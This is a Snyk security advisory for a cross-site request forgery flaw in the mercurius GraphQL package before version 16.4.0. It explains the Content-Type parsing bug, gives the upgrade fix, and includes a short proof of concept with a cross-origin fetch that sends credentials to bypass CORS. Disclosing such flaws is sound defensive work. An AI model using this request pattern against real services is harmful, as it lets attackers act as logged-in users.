Homepage

Cross-site Request Forgery (CSRF) Affecting mercurius package, versions <16.4.0

Severity

 Recommended
0.0
medium
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.01% (1st percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Cross-site Request Forgery (CSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-MERCURIUS-15428327
  • published6 Mar 2026
  • disclosed5 Mar 2026
  • creditSimone Sanfratello
Report a new vulnerability Found a mistake?

Introduced: 5 Mar 2026

NewCVE-2025-64166  (opens in a new tab)
CWE-352  (opens in a new tab)

How to fix?

Upgrade mercurius to version 16.4.0 or higher.

Overview

mercurius is a GraphQL adapter for Fastify

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to incorrect parsing of the Content-Type header. An attacker can perform unauthorized actions on behalf of an authenticated user by sending specially crafted cross-origin requests that bypass CORS protections.

PoC

// Server-side Fastify setup
const Fastify = require('fastify');
const mercurius = require('mercurius');

const app = Fastify();
const schema = `
  type Query {
    hello(name: String): String
  }
`;

const resolvers = {
  Query: {
    hello: (_, { name }) => `Hello ${name || 'World'}!`
  }
};

app.register(mercurius, { schema, resolvers });

app.listen(3000, () => {
  console.log('Server listening on http://localhost:3000');
});

// Malicious client-side code
fetch('http://localhost:3000/graphql', {
  method: 'POST',
  body: JSON.stringify({ query: '{ hello(name: "attacker") }' }),
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded'
  },
  credentials: 'include'
});

CVSS Base Scores

version 4.0
version 3.1